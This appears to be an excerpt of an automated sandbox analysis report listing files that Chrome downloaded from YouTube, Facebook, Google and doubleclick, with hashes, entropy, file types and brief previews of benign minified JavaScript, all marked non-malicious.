                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/desktop/87423d78/jsbin/spf.vflset/spf.js
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 21 x 409, 8-bit colormap, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):2540
                                                                                                                                                                                  Entropy (8bit):7.241602582463701
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:hjUR4TN+zzhq3Y40mP0VFx2teUFhZX3cUxadsKx6aBDLUSZ:V8cN93vQOeUFhZX3cJ/IaBDLzZ
                                                                                                                                                                                  MD5:617B29D87C8BE0A9E367320313656B2A
                                                                                                                                                                                  SHA1:46320109EDC1764CFBC60AD4F031E4018CF6ADEF
                                                                                                                                                                                  SHA-256:286E3110841E9FCE71D0E8CFCA1D1B7B0EDF781AF6D752ABF05F89AA6760EE79
                                                                                                                                                                                  SHA-512:42CEAF698DD7556BBA2BA11264B9923E66EBC514AF8554EBACF83391E7AA690E5DFAB2222872D40B61AE5FAF1500D22E6077808D0F5341088C70B36DEAA52C19
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y2/r/2UXBRrhCqJH.png
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x960, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):50309
                                                                                                                                                                                  Entropy (8bit):7.953514743295348
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:qa9bRtAljRc8CzVNoNL8varrcWhJSXkJjQur0:NKcFzANxcx0hZ0
                                                                                                                                                                                  MD5:11F793077860FBFD4F3F363BDEFA4029
                                                                                                                                                                                  SHA1:0D9039180C53647608420BC576DDCF16761B968B
                                                                                                                                                                                  SHA-256:2B577D303AC60280016188BAC3A6312ABF2EC3056F5E38EFAAC77F1E53A31A51
                                                                                                                                                                                  SHA-512:DB77CB73507820A64CEC8D6B7C9F4FA0274CB169637FC297964441ADA58594ADB756A11C405F55E93A0EFD78AA55052099DDEA598330BA8A3BC75DDAB6979FA7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t51.29350-10/429002936_1427569127874570_76749294478997084_n.jpg?stp=dst-jpg_s960x960&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=9sRvTcw9bFQAX9mQrRD&_nc_ht=scontent-lga3-2.xx&oh=00_AfC0c9YNce-Nro59T3-4iGH_UC8t_AQvfwuP5OcmdFWdVw&oe=65DBAFC4
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (533)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5547
                                                                                                                                                                                  Entropy (8bit):5.234104150395812
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:+E8YzVFXsVws8HYnkfI+C4yVdbaiGkNF2LSaAuEeRzgf5j6YJR79hamaWslv0Rw:+ajsVws8Hlzg2i/N9hzWgf5jhJR79haZ
                                                                                                                                                                                  MD5:936A7C8159737DF8DCE532F9EA4D38B4
                                                                                                                                                                                  SHA1:8834EA22EFF1BDFD35D2EF3F76D0E552E75E83C5
                                                                                                                                                                                  SHA-256:3EA95AF77E18116ED0E8B52BB2C0794D1259150671E02994AC2A8845BD1AD5B9
                                                                                                                                                                                  SHA-512:54471260A278D5E740782524392249427366C56B288C302C73D643A24C96D99A487507FBE1C47E050A52144713DFEB64CD37BC6359F443CE5F8FEB1A2856A70A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://www.youtube.com/s/desktop/87423d78/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x960, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):35166
                                                                                                                                                                                  Entropy (8bit):7.955833171657125
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:WSWZtAXVlOcjjjjjjnrlu7R/dJKpX3a7qr8d9rQaUyqdvjX7CsiHdJukc6cuc+Go:WSWZqPHKVJlrXVSL3jPM3R4vKfmx0
                                                                                                                                                                                  MD5:1FF9B8D91D58D7531FE96FF87F4B6458
                                                                                                                                                                                  SHA1:C94F0DD7E76C5FAF8591C84CE1B4016EE7AAF82D
                                                                                                                                                                                  SHA-256:4FBDF05A3E048876889B0B36BC0102FC5E85612F85CFF73871ED3DB6C9423DC8
                                                                                                                                                                                  SHA-512:59E26BFD1B44431D6EE959EC92220C37CC9E1D9F051090A276C3ED27ABE910EA3EA40D12880369793CB76E3C183E529FD65BECC938146C90A33C2EF9C3C2E72C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t15.5256-10/426166576_399616406052465_4268749543528247153_n.jpg?stp=dst-jpg_s960x960&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=3JaVY4IWz3kAX8YNVSo&_nc_ht=scontent-lga3-2.xx&oh=00_AfAvWETlXrzDjzpb6cHsENE7Q-DSs9FbwQ3_JglkHMlPpQ&oe=65DB49AD
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                  Entropy (8bit):2.6465732373896285
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:Es5ed8vZa+/kffJTyN5J5iXSvjDxatgFFjiZq1MJUikeVgl2fwFfBaTzh4mpCbak:2fq3OqXAzh4jaJV9HxG8Q
                                                                                                                                                                                  MD5:3E764F0F737767B30A692FAB1DE3CE49
                                                                                                                                                                                  SHA1:58FA0755A8EE455819769EE0E77C23829BF488DD
                                                                                                                                                                                  SHA-256:88AE5454A7C32C630703440849D35C58F570D8EECC23C071DBE68D63CE6A40D7
                                                                                                                                                                                  SHA-512:2831536A2CA9A2562B7BE1053DF21C2ED51807C9D332878CF349DC0B718D09EEB587423B488C415672C89E42D98D9A9218FACE1FCF8E773492535CB5BD67E278
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/yT/r/aGT3gskzWBf.ico
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (2360)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):216276
                                                                                                                                                                                  Entropy (8bit):5.455491059432931
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:E0nzyu8ItYoHFldaY4xzuQVLlGDPcHGcpP:lnCuYgTaY4/GqGQP
                                                                                                                                                                                  MD5:A1C97A27D5C64B97D4E96D5EACA3B8AA
                                                                                                                                                                                  SHA1:89C48372DBAD07D2EFE10475B14E6CDCA0BC2E80
                                                                                                                                                                                  SHA-256:C150006B9F983B4716C91B10C2E5888857F52E303BE151F27A9DF26FF2CE900B
                                                                                                                                                                                  SHA-512:7D18B750F8293E0606A43FC114D7E2AA0BD671C1A552F955A5A0137AB9F03ABD27AB03E3127E0E7BAE8B5947F301B5139FA0227DE8B6E2B8FB232A2679F5AD18
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/am=P2CJhmMBEJhZTvP3jJPDAAAAAAAAAAAAawA7/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlFU0Eb88gCMWemHf1wS2H0QUzNV-Q/m=_b,_tp"
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15860, version 1.0
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15860
                                                                                                                                                                                  Entropy (8bit):7.988022700476719
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:S7qmPTF4N21t//YW2FS6+1XxrsbGmjlAbvqMmtCN:S621tHY4xwbGmjloSM7N
                                                                                                                                                                                  MD5:E9F5AAF547F165386CD313B995DDDD8E
                                                                                                                                                                                  SHA1:ACDEF5603C2387B0E5BFFD744B679A24A8BC1968
                                                                                                                                                                                  SHA-256:F5AEBDFEA35D1E7656EF4ACC5DB1F243209755AE3300943EF8FC6280F363C860
                                                                                                                                                                                  SHA-512:2A71EDB5490F286642A874D52A1969F54282BC43CB24E8D5A297E13B320321FB7B7AF5524EAC609CF5F95EE08D5E4EC5803E2A3C8D13C09F6CC38713C665D0CE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (2360)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):216277
                                                                                                                                                                                  Entropy (8bit):5.455502756372822
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:j0nzyu8ItYoHFldaY4xzuQVLlGDPcHGcpP:QnCuYgTaY4/GqGQP
                                                                                                                                                                                  MD5:92BBD73283CCF052912D68922E212C38
                                                                                                                                                                                  SHA1:92F9A1D0628EE58A31E234953548FF16E3B390B4
                                                                                                                                                                                  SHA-256:BD33427A7076736CB9783D3E994B178A1882002E5B3F2D902D204A47A96AEA77
                                                                                                                                                                                  SHA-512:D854079F95E08F624D8B0E27732F54A8D17C33B0F3661E7D9370CEC5418605BBBCC689930462A261CD92570CE4F30CD8457A4CDA702C29B73DA05B00628FD0F3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/am=P2CJlmMBEJhZTvP3jJPDAAAAAAAAAAAAawA7/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlEEgWEfV3yt47xiVu7pvO4I3STIzw/m=_b,_tp"
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15920, version 1.0
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15920
                                                                                                                                                                                  Entropy (8bit):7.987786667472439
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:sShqOXQlaSchOwK0uFvRqq3xR/xb5OY3aU/lHS9WE2YeK1os:sShJKaScJK0uFvRvxb5OY3aU/lHkmK
                                                                                                                                                                                  MD5:3A44E06EB954B96AA043227F3534189D
                                                                                                                                                                                  SHA1:23CEF6993DDB2B2979E8E7647FC3763694E2BA7D
                                                                                                                                                                                  SHA-256:B019538234514166EC7665359D097403358F8A4C991901983922FB4D56989F1E
                                                                                                                                                                                  SHA-512:FAB970B250DD88064730BD2603C530F3503ABB0AF4E4095786877F9660A159BF4AD98C5ABEA2E95EB39AE8C13417736B5772FCB9F87941FF5E0F383CB172997F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x960, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):82271
                                                                                                                                                                                  Entropy (8bit):7.982948558747172
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:YkomOkaydBbegkYZPfCnc0/67wLh8UUE2PvzqWrbGdCHzf3unRNjqIMRc5YWv6:umOk7dFPPqc0/fLhRTWrF30bIAy
                                                                                                                                                                                  MD5:072CE8B959DEFD50D4C28B815B27CFD6
                                                                                                                                                                                  SHA1:C829740BCB57849AA828A38C2CD7E03B0C4F1057
                                                                                                                                                                                  SHA-256:87EF90EAC25F046CE2DBC8CAC7076366EB8F108C06544DF003136A1EA8F2C02D
                                                                                                                                                                                  SHA-512:CFFF154D03089C83EA3C497B7F67A940A02101FE9067FF0F800694F85F8BCD9B0592BAA327177CE68568EBFDD84A5CA4DBAE266F50197D60823EB03A801F4D2E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t15.5256-10/425986675_914058756846026_5537994848109864817_n.jpg?stp=dst-jpg_s960x960&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=cGExTFK4M7UAX_d0k50&_nc_ht=scontent-lga3-2.xx&oh=00_AfBuZRx5-uyxUDIsIQHFS_y8FgnWM11izqrh-zBHE6GmxA&oe=65DA6225
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (10590)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):30454
                                                                                                                                                                                  Entropy (8bit):5.576137902379071
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:8/86aj6dY3cJpu4MN0As67qVOqIfhE8r8to8p85at48Wpe8KU8s7MiT8PtFvd:87aj5MJpu4MN0As6H5Gt4vuiTEZd
                                                                                                                                                                                  MD5:80EC39CA7A3BE13B675B5751FFBF45B0
                                                                                                                                                                                  SHA1:82161B242CFF2FBE988C3A838A057F083D524F40
                                                                                                                                                                                  SHA-256:C41583B8960E530A88B12C0780549D8C99A74B2CC5F983C686B6C585F699D98B
                                                                                                                                                                                  SHA-512:0382ED1DC9F412B176B514365C9AAFA1495D5FC692F07773F42C5F9E5EFCB7229ED16F14A48184C5850395D5037A3474D92C641020149F514767BB12F474D001
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iYu44/yU/l/en_US/nNbHix9dhZw.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("GroupsCometMemberProfileLink_group.graphql",[],(function(a,b,c,d,e,f){"use strict";a={argumentDefinitions:[],kind:"Fragment",metadata:null,name:"GroupsCometMemberProfileLink_group",selections:[{alias:null,args:null,kind:"ScalarField",name:"answer_agent_id",storageKey:null}],type:"Group",abstractKey:null};e.exports=a}),null);.__d("CometDisabledContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(!1);g["default"]=b}),98);.__d("BaseHScrollConstants",[],(function(a,b,c,d,e,f){"use strict";a=1600;b=10;f.MAX_CONTAINER_WIDTH=a;f.WIGGLE_ROOM=b}),66);.__d("smoothScrollTo",["ExecutionEnvironment","UserAgent"],(function(a,b,c,d,e,f,g){"use strict";var h,i=c("UserAgent").isBrowser("Firefox");b=(h||(h=c("ExecutionEnvironment"))).canUseDOM&&window.matchMedia("(prefers-reduced-motion: reduce)");var j=b&&b.matches,k=(h||(h=c("ExecutionEnvironment"))).canUseDOM&&document.documentElement!=null&&"scrollBehavior"in document.documentElemen
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):52
                                                                                                                                                                                  Entropy (8bit):4.542000661265563
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:yVkxzNDrMKcwVbF7KnZ:yVkxtkwVbF7KZ
                                                                                                                                                                                  MD5:B3B89B9C275343BC6798E3A83564FDDB
                                                                                                                                                                                  SHA1:32367475C527C3F5E5DB0BF42C348816FF4D157B
                                                                                                                                                                                  SHA-256:900FB968F7FD9EA55F600AC9002A89E56AB56597DA7BDE04DEAAE6CC77AEB276
                                                                                                                                                                                  SHA-512:ADB6938104E802B0936630B216CDE732F21ECA6E60E7A31D1B9C8FF52B5A66A712A7ECDE3F8ED4915D15C0A71C33A9788060E1E22999094C39020A1F8C636874
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
                                                                                                                                                                                  Preview:CiUKDQ0ZARP6GgQIVhgCIAEKCw3oIX6GGgQISxgCCgcN05ioBxoA
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (4626)
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):23279
                                                                                                                                                                                  Entropy (8bit):5.407857871342186
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:bBQaRLUCHqNBPWqYjqr70r2vZ7Jg8qlL2XikJyJpXZ:bzLUCKNBzYuX0r2hJJBYTXZ
                                                                                                                                                                                  MD5:7001296FE9C04A4056B6AEE2E4CA1977
                                                                                                                                                                                  SHA1:CCDCF52DC50A43D48452633F6E4D0B17B7C7F008
                                                                                                                                                                                  SHA-256:7A18C2C3022B0FFDCA24E076929CAF4F053FED4C1E8ED3DB08BBE0DAE1F11332
                                                                                                                                                                                  SHA-512:9B81E709540455174A90594B7509E0E529FD69B5E029E160EE824978EFA9243973E473578FED9CCF04F73952F98A5190BDA5C7DE7A7AD469DA4EB18333E67C57
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3ib3v4/yo/l/en_US/vwqID5lbHXG.js?_nc_x=Ij3Wp8lg5Kz
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometInputWithCommands.react",["CometComponentWithKeyCommands.react","CometKeys","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||(h=d("react")),j=h.useMemo;function a(a){var b=j(function(){var b=[];a.enter!=null&&b.push({command:{key:c("CometKeys").ENTER},description:a.enter.description,handler:a.enter.handler,triggerFromInputs:!0});a["delete"]!=null&&b.push({command:{key:c("CometKeys").DELETE},description:a["delete"].description,handler:a["delete"].handler,triggerFromInputs:!0});a.up!=null&&b.push({command:{key:c("CometKeys").UP},description:a.up.description,handler:a.up.handler,triggerFromInputs:!0});a.down!=null&&b.push({command:{key:c("CometKeys").DOWN},description:a.down.description,handler:a.down.handler,triggerFromInputs:!0});a.tab!=null&&b.push({command:{key:c("CometKeys").TAB},description:a.tab.description,handler:a.tab.handler,triggerFromInputs:!0});a.esc!=null&&b.push({command:{key:c("CometKeys").ESCAPE},description:a.esc.description,handler
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 206x366, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):22854
                                                                                                                                                                                  Entropy (8bit):7.970852909542257
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:GmFHoGKNZqUF/YCu7QEY2UZ87r/3WiFVSt9egG9m4svR+ZUmwPJYlPtmpArklU:GmFIGKzqs/YCu7QEY2UQ/3Wpt9egGmZw
                                                                                                                                                                                  MD5:DDFA55C63AE0C44CA90EEEDCF31ED3D8
                                                                                                                                                                                  SHA1:8FCFB2A1DBF341E023B488BC99D0B3A90B497D5A
                                                                                                                                                                                  SHA-256:0484B79037E1397AB8FEF1045FAE57665A2B8938B6F628F01D256962A7002F51
                                                                                                                                                                                  SHA-512:FF48A313EA778A6CBA3FAED81F939FFFE54D6BAE422E868162DBE1CE920FE69965272E671BAC4CD86044FBA871F34CD3DBF1C2D2FE87EDC6E442D804F636CDFD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t15.5256-10/426298841_1492415047972648_5212976652358649185_n.jpg?stp=dst-jpg_p206x206&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=kESdgojdjQwAX-vciDl&_nc_ht=scontent-lga3-2.xx&oh=00_AfCkLCLuaAN1hpkn2W_GhMGtY0uHotI_SBZYNbu_XTOF3A&oe=65DAB407
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15552
                                                                                                                                                                                  Entropy (8bit):7.983966851275127
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                                                                                  MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                                                  SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                                                  SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                                                  SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                  Entropy (8bit):4.142295219190901
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:lZOwFQvn:lQw6n
                                                                                                                                                                                  MD5:1FA71744DB23D0F8DF9CCE6719DEFCB7
                                                                                                                                                                                  SHA1:E4BE9B7136697942A036F97CF26EBAF703AD2067
                                                                                                                                                                                  SHA-256:EED0DC1FDB5D97ED188AE16FD5E1024A5BB744AF47340346BE2146300A6C54B9
                                                                                                                                                                                  SHA-512:17FA262901B608368EB4B70910DA67E1F11B9CFB2C9DC81844F55BEE1DB3EC11F704D81AB20F2DDA973378F9C0DF56EAAD8111F34B92E4161A4D194BA902F82F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://static.doubleclick.net/instream/ad_status.js
                                                                                                                                                                                  Preview:window.google_ad_status = 1;.
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15344
                                                                                                                                                                                  Entropy (8bit):7.984625225844861
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                                                  MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                                                  SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                                  SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                                  SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 206x366, components 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):15990
                                                                                                                                                                                  Entropy (8bit):7.9600028505387215
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:TomnjH1AAnoHLtnHMczhyGEVzTvLjMDkmTj8WgUCG+8J65:kmn7REtsD3V/84ocUCGJ65
                                                                                                                                                                                  MD5:143509F1E9D107D804A52DAD69764407
                                                                                                                                                                                  SHA1:C84E0408CC054FACD3D71085DAEFA0FAEF153A27
                                                                                                                                                                                  SHA-256:0C0617A9B1559EF0E9F6564347EA395A78BE49D57CD5BEB78D65D3721EC0F1E5
                                                                                                                                                                                  SHA-512:B0BB3F674668A74B019C41611F8575A7AEB8313DF81AC6137920A9EF4C03D5887A633EAF4508812E5F6D8F0F5CA58659FC68128037FA03D8B492E531EF5622F8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://scontent-lga3-2.xx.fbcdn.net/v/t51.29350-10/426723713_3627042410867961_5605923069429394965_n.jpg?stp=dst-jpg_p206x206&_nc_cat=1&ccb=1-7&_nc_sid=1a7029&_nc_ohc=Ku5YSyUzn8IAX9kwnc9&_nc_ht=scontent-lga3-2.xx&oh=00_AfDbb6L8NvhsgkcOBsJdBQPvAKBrey6S4uQ95zPCvCxe-Q&oe=65DAC2F3
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):473
                                                                                                                                                                                  Entropy (8bit):5.240157994693449
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:kxeXjxeX4wFbcloiHKobO4xMl23ZhVgBDKDi7e8kbRNfeX60:kMYDRiqobPxi2fVgB+XprGJ
                                                                                                                                                                                  MD5:13782B3B1A5B6B82B186225398C96C55
                                                                                                                                                                                  SHA1:AA9E89FABF00C27173190096499F47FAEE56C684
                                                                                                                                                                                  SHA-256:1EAF3863ADA2FC1BC5C99F0731313B8046C576403EC8721757F935B8245C2C26
                                                                                                                                                                                  SHA-512:D966BA31E97827381C2F26E9DC069A6DA26EFFEE26AE9C1965A73C1CFB4A852A6F4C94BF60B1F33719A3AF522CA0B868D99833E422FDEAD8644BD527118AE685
                                                                                                                                                                                  Malicious:false
